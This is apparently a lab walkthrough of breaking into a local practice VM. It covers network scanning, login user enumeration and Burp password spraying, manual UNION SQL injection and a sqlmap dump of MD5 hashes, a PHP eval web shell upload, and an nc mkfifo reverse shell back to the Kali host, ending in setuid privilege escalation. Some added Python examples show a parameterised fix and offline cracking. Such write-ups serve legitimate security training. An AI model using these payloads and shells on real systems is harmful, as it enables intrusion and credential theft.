Information gathering

  • Kali and the target VM are both attached to VMware's NAT network, so the target is scanned from Kali.
  • First, check Kali's own IP address:
┌──(root㉿kali)-[/opt/antsword]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.133 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::20c:29ff:fef8:7def prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:f8:7d:ef txqueuelen 1000 (Ethernet)
RX packets 21771 bytes 6035507 (5.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 21960 bytes 3882174 (3.7 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  • Scan the local subnet to find the target's IP address:
┌──(root㉿kali)-[/opt/antsword]
└─# arp-scan 192.168.1.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:f8:7d:ef, IPv4: 192.168.1.133
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1 00:50:56:c0:00:08 VMware, Inc.
192.168.1.2 00:50:56:f2:24:22 VMware, Inc.
192.168.1.140 00:0c:29:23:07:8b VMware, Inc.
192.168.1.254 00:50:56:f7:78:15 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.974 seconds (129.69 hosts/sec). 4 responded
  • The 00:50:56 MAC prefixes belong to VMware's own virtual-network services, while 00:0c:29 prefixes are guest VMs; Kali is 00:0c:29:f8:7d:ef, so the other guest, 192.168.1.140, is the target. Scan all of its TCP ports:
┌──(root㉿kali)-[/opt/antsword]
└─# nmap -p- 192.168.1.140
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-16 08:38 EST
Nmap scan report for 192.168.1.140
Host is up (0.00065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:23:07:8B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 18.25 seconds
  • Fingerprint the services on the two open ports:
┌──(root㉿kali)-[/opt/antsword]
└─# nmap -p 22,80 -sV 192.168.1.140
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-16 08:40 EST
Nmap scan report for 192.168.1.140
Host is up (0.00060s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
MAC Address: 00:0C:29:23:07:8B (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.59 seconds
  • Port 80 serves a web application. Brute-forcing SSH is normally not the first move, so start with the web service in a browser:

(screenshot: the web application's login page)

Brute force

  • It is a login form. There are three usual ways in:

    • SQL injection with a universal password

    • Weak credentials, e.g. admin/123456

    • Brute force with BurpSuite

  • Register an account to test with, then try the universal-password payloads in the login form:

' or 1 = 1 #
" or 1 = 1 #
  • Neither works, but the error handling leaks something useful: the form distinguishes an unknown account from a wrong password, which is a user-enumeration flaw.

(screenshot: the "account does not exist" message)

  • When the username is wrong the page says the account does not exist, so valid usernames can be enumerated first and the password attack aimed only at those.
  • Try a few likely usernames:
admin
system
test

(screenshot: the error returned for the test user)

  • With test the message changes to a failed login, so the test account exists.
  • Then a few common passwords:
123456
admin@123
test@123
  • None of them work, so hand the request to BurpSuite Intruder:

(screenshot: the login request captured in Burp)

(screenshot: the request loaded into Intruder)

  • Mark the password field as the payload position, load Burp's built-in password list and start the attack:

(screenshot: the Intruder attack running)

  • Sorting the results by response length, a surprising number of passwords appear to succeed. That is odd, but response length is only a rough signal; whatever the cause, trying them by hand confirms that they all log in, and the backend opens up:

(screenshot: the backend after login)
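The enumerate-then-spray flow above, written out as an added example that is not part of the original write-up. The target's login handler is a black box, so stub_login_post is a constructed stand-in that reproduces only the two observed messages; the account and password inside it are assumptions. The point of the example is the comparison: each response is fingerprinted by status plus a body digest and compared with a wrong-password baseline, which is stricter than sorting Intruder results by length.

```python
# Added example, not from the original write-up: user enumeration through
# differing error messages, then a password spray that compares each
# response against a baseline fingerprint instead of eyeballing lengths.
import hashlib
from typing import Callable, Iterable

# (status, body) is enough to fingerprint a login attempt.
Response = tuple[int, str]
PostFn = Callable[[str, str], Response]

# Constructed stand-in for the target's login endpoint. Only the two
# observed behaviours are modelled; the credential is an assumption.
_STUB_ACCOUNTS = {"test": "hunter2"}


def stub_login_post(username: str, password: str) -> Response:
    if username not in _STUB_ACCOUNTS:
        return 200, "<div class='err'>Account does not exist</div>"
    if _STUB_ACCOUNTS[username] != password:
        return 200, "<div class='err'>Wrong username or password</div>"
    return 302, "Location: /home.php"


def fingerprint(resp: Response) -> tuple[int, str]:
    """Status plus a body digest: two responses that differ by a single
    byte get different fingerprints, which sorting by length can miss."""
    status, body = resp
    return status, hashlib.sha256(body.encode()).hexdigest()


def enumerate_users(post: PostFn, candidates: Iterable[str]) -> list[str]:
    """A username is valid when the app stops saying it does not exist.
    The probe password is deliberately implausible."""
    found = []
    for user in candidates:
        _, body = post(user, "\x00-probe-" + user)
        if "does not exist" not in body.lower():
            found.append(user)
    return found


def spray(post: PostFn, username: str, wordlist: Iterable[str]) -> list[str]:
    """Return every password whose response deviates from the wrong-password
    baseline. Anything returned still has to be verified by logging in."""
    baseline = fingerprint(post(username, "\x00-baseline-not-a-password"))
    return [pw for pw in wordlist if fingerprint(post(username, pw)) != baseline]


if __name__ == "__main__":
    users = enumerate_users(stub_login_post, ["admin", "system", "test"])
    print("valid users:", users)
    for u in users:
        print(u, "->", spray(stub_login_post, u,
                             ["123456", "admin@123", "test@123", "hunter2"]))
```

Against a real target, replace stub_login_post with a function that submits the captured form and returns the status and body; the enumeration and spray logic stay the same.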

SQL injection

  • The backend has a book-search module; click search to see what it does:

(screenshot: the search results)

  • It really is a book search, so the field is a candidate for SQL injection. Test it by hand (the HackBar extension in Firefox misbehaves here):
Linux OS                  # normal. Note: copying the Book Title from the page brings along a trailing space that breaks the injection later, and the title must be typed in full
Linux OS' --              # normal
Linux OS' and 1=1 --      # normal
Linux OS' and 1=2 --      # different: no result, so the condition is being evaluated, i.e. the input lands inside a SQL string literal

(screenshot: the and 1=1 result)

(screenshot: the and 1=2 result)

  • Extract data by hand with a UNION query. The leading "-" turns the title into one that does not exist, so only the injected SELECT returns rows; "pasword" is genuinely how the column is spelled in the schema. If the search parameter were sent in a GET URL, the trailing # would have to be encoded as %23 or the browser would treat it as a fragment:
search=Linux OS' order by 3 #    -- normal
search=Linux OS' order by 4 #    -- error, so the query returns 3 columns

search=-Linux OS' union select 1,2,3 #
search=-Linux OS' union select 1,database(),3 #    -- webapphacking
search=-Linux OS' union select 1,group_concat(schema_name),3 from information_schema.schemata #
information_schema,mysql,performance_schema,sys,webapphacking
search=-Linux OS' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'webapphacking' #
books,users
search=-Linux OS' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'webapphacking' and table_name = 'users' #
id,user,pasword,name,address
search=-Linux OS' union select 1,group_concat(user,'-',pasword,'<hr/>'),3 from users #

user1-5d41402abc4b2a76b9719d911017c592
user2-6269c4f71a55b24bad0f0267d9be5508
user3-0f359740bd1cda994f8b55330c86d845
test-05a671c66aefea124cc08b76ea6d30bb
superadmin-2386acb2cf356944177746fc92523983
test1-05a671c66aefea124cc08b76ea6d30bb
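The same probe-and-UNION technique run against a miniature copy of the schema, as an added example that is not the write-up's own code. It uses SQLite in memory so it runs offline, which changes three details from the MySQL payloads above: the # comment becomes --, group_concat(a,'-',b) becomes group_concat(a||'-'||b), and information_schema.tables becomes sqlite_master. The table contents are constructed from the dump (two of the hashes are copied in); the parameterised query beside the vulnerable one shows why binding the value closes the hole.

```python
# Added example, not from the original write-up: the book search rebuilt on
# SQLite with string concatenation (vulnerable) and with a bound parameter
# (fixed), plus the column-count probe and UNION dump run against both.
import sqlite3
from typing import Callable, Optional


def build_db() -> sqlite3.Connection:
    """Constructed miniature of the webapphacking schema, including the
    misspelled 'pasword' column and two hashes copied from the dump."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE books(id INTEGER PRIMARY KEY, title TEXT, author TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, user TEXT, pasword TEXT,
                           name TEXT, address TEXT);
        INSERT INTO books(title, author) VALUES ('Linux OS', 'n/a'),
                                                ('Web Hacking', 'n/a');
        INSERT INTO users(user, pasword, name, address) VALUES
          ('user1', '5d41402abc4b2a76b9719d911017c592', 'n/a', 'n/a'),
          ('superadmin', '2386acb2cf356944177746fc92523983', 'n/a', 'n/a');
    """)
    return con


def search_vulnerable(con: sqlite3.Connection, term: str) -> list:
    # The user-controlled term is spliced into the statement text, so a
    # quote in it ends the literal and the rest is parsed as SQL.
    sql = f"SELECT id, title, author FROM books WHERE title = '{term}'"
    return con.execute(sql).fetchall()


def search_fixed(con: sqlite3.Connection, term: str) -> list:
    # The term travels as a bound value; quotes and comments in it are data.
    sql = "SELECT id, title, author FROM books WHERE title = ?"
    return con.execute(sql, (term,)).fetchall()


def count_columns(search: Callable[[str], list], limit: int = 16) -> Optional[int]:
    """ORDER BY n succeeds until n exceeds the column count, exactly like
    the 'order by 3' / 'order by 4' probe. None means no probe errored,
    i.e. the input is not reaching the parser."""
    for n in range(1, limit + 1):
        try:
            search(f"Linux OS' order by {n} --")
        except sqlite3.OperationalError:
            return n - 1
    return None


def dump_users(search: Callable[[str], list]) -> list[str]:
    """UNION the users table into the three-column result set."""
    rows = search("-Linux OS' union select 1,group_concat(user||'-'||pasword),3 "
                  "from users --")
    return rows[0][1].split(",") if rows else []


if __name__ == "__main__":
    con = build_db()
    vuln = lambda t: search_vulnerable(con, t)
    print("columns:", count_columns(vuln))
    print("tables:", vuln("-Linux OS' union select 1,group_concat(name),3 "
                          "from sqlite_master where type='table' --"))
    print("dump:", dump_users(vuln))
    print("fixed:", dump_users(lambda t: search_fixed(con, t)))
```

The fixed variant returns nothing for every payload because the whole string, quote and comment included, is compared against the title column as a value; count_columns never sees an error from it, which is the quickest way to tell the two apart from the outside.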
  • The manual injection works; confirm it with sqlmap, reading the saved request and pointing it at the search parameter:
sqlmap -r url.txt -p search --batch

sqlmap -r url.txt -p search --batch -D webapphacking -T users -C user,pasword --dump

(screenshot: sqlmap confirming the injection)

(screenshot: sqlmap dumping the users table)

  • sqlmap's built-in dictionary attack does not recover the superadmin hash, so look it up on an online MD5 reverse-lookup site. The hashes are unsalted MD5, which is the only reason a plain lookup works:

(screenshot: the online lookup result)
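An offline alternative to the online lookup, as an added example that is not part of the write-up: a dictionary attack over the dumped hashes, so that nothing from the target has to be pasted into a third-party site. The hashes are the ones from the dump above; the wordlist is a constructed stand-in for a real list such as rockyou.txt, and only one entry in it happens to match. The second function uses a property of unsalted hashes that the dump already shows: test and test1 have the same digest, so they have the same password.

```python
# Added example, not from the original write-up: an offline dictionary attack
# on the dumped hashes, plus a check for accounts that share a password.
import hashlib
from collections import defaultdict

# Copied from the union-select dump above.
DUMPED_HASHES = {
    "user1": "5d41402abc4b2a76b9719d911017c592",
    "user2": "6269c4f71a55b24bad0f0267d9be5508",
    "user3": "0f359740bd1cda994f8b55330c86d845",
    "test": "05a671c66aefea124cc08b76ea6d30bb",
    "superadmin": "2386acb2cf356944177746fc92523983",
    "test1": "05a671c66aefea124cc08b76ea6d30bb",
}

# Constructed stand-in for a real wordlist such as rockyou.txt.
WORDLIST = ["123456", "password", "admin@123", "test@123", "hello", "letmein"]


def looks_like_md5(h: str) -> bool:
    h = h.lower()
    return len(h) == 32 and all(c in "0123456789abcdef" for c in h)


def crack_md5(hashes: dict[str, str], wordlist) -> dict[str, str]:
    """Hash each candidate once and look every user up in the result;
    without a salt, one pass over the wordlist covers all accounts."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table[h.lower()] for user, h in hashes.items()
            if looks_like_md5(h) and h.lower() in table}


def shared_passwords(hashes: dict[str, str]) -> dict[str, list[str]]:
    """Identical digests mean identical passwords when there is no per-user
    salt: this groups accounts that will fall together before any cracking."""
    groups = defaultdict(list)
    for user, h in hashes.items():
        groups[h.lower()].append(user)
    return {h: users for h, users in groups.items() if len(users) > 1}


if __name__ == "__main__":
    print("cracked:", crack_md5(DUMPED_HASHES, WORDLIST))
    print("shared:", shared_passwords(DUMPED_HASHES))
```

With the small constructed list only user1 falls (its digest is MD5 of "hello"); the superadmin hash stays uncracked, which is the same outcome sqlmap reported and the reason the write-up falls back to a lookup service.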

File upload

  • The lookup gives Uncrackable, so log in as superadmin/Uncrackable:

(screenshot: logged in as superadmin)

  • The backend has an upload function; write a minimal PHP web shell and upload it (the index is quoted as 'v' so PHP does not have to fall back on an undefined constant):
<?php eval($_POST['v']); ?>

(screenshot: the upload form)

  • The upload succeeds and the response says the file went to the uploads directory; open it:

(screenshot: the uploaded shell)

  • It is reachable.

Directory scanning

  • Without that hint, a directory brute-force tool would find the backend paths; for example with feroxbuster:
feroxbuster -u http://192.168.1.140

(screenshot: feroxbuster output)

  • Opening the discovered path shows that directory listing is enabled on uploads as well, so every uploaded file is visible by name:

(screenshot: the uploads directory listing)

  • Connect to the shell with AntSword, using the uploaded file's URL and v as the connection password:

(screenshot: the AntSword connection)

  • Connected.

NC reverse shell

  • AntSword's built-in terminal is awkward, so bounce a shell back to Kali with nc. Start the listener on Kali first, then run the one-liner through AntSword:
# On Kali, listen first
nc -lvvp 4444

# In AntSword's terminal, on the target
rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.1.133 4444 >/tmp/f

(screenshot: the reverse shell arriving)

  • Shell received.

Privilege escalation

  • The shell runs as www-data, which is too limited, so look for an escalation path. Start with which accounts have a login shell:
www-data@hackme:/var/www/html/uploads$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
hackme:x:1000:1000:hackme:/home/hackme:/bin/bash
  • There is a hackme user; check the home directories:
www-data@hackme:/home$ ls
hackme
legacy
www-data@hackme:/home$ cd hackme
www-data@hackme:/home/hackme$ ls
  • hackme's home is empty, but there is also a legacy directory; look inside:

(screenshot: the contents of /home/legacy)

  • It holds a binary that www-data is allowed to execute. Run it:

(screenshot: running the binary)

  • Privilege escalation succeeded.
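The check a practitioner would run before executing a stray binary in someone else's home directory, as an added example that is not part of the write-up: enumerate setuid and setgid files, since a binary that hands a low-privilege user more rights when run is normally one with the setuid bit set. The walk uses lstat so symlinks are never followed, and skips anything it cannot stat. demo() builds a constructed temp directory with one setuid file under a hypothetical name; on a real target the call is find_setid_files("/"), the equivalent of find / -perm -4000 -type f 2>/dev/null.

```python
# Added example, not from the original write-up: a local-enumeration helper
# that lists setuid/setgid files under a root, the check that explains why
# running an executable found in another user's home can hand over privileges.
import os
import stat
import tempfile


def find_setid_files(root: str) -> list[tuple[str, int, int, str]]:
    """Walk root without following symlinks and return (path, uid, gid, mode)
    for every regular file with the setuid or setgid bit set."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)        # lstat: never follow symlinks
            except OSError:
                continue                   # unreadable: skip, keep walking
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, st.st_uid, st.st_gid,
                             oct(stat.S_IMODE(st.st_mode))))
    return sorted(hits)


def demo() -> list[str]:
    """Constructed sandbox: one setuid file and one plain file in a temp
    directory. 'legacy-bin' is a hypothetical name, not the target's."""
    with tempfile.TemporaryDirectory() as d:
        plain = os.path.join(d, "notes.txt")
        setuid = os.path.join(d, "legacy-bin")
        for p in (plain, setuid):
            with open(p, "w") as f:
                f.write("#!/bin/sh\nid\n")
        os.chmod(plain, 0o755)
        os.chmod(setuid, 0o4755)           # owner rwx + setuid
        return [os.path.basename(p) for p, _, _, _ in find_setid_files(d)]


if __name__ == "__main__":
    print(demo())
```

The uid in each hit matters as much as the bit: a setuid file owned by root is the one worth running, while a setuid file owned by an ordinary user only gets you that user.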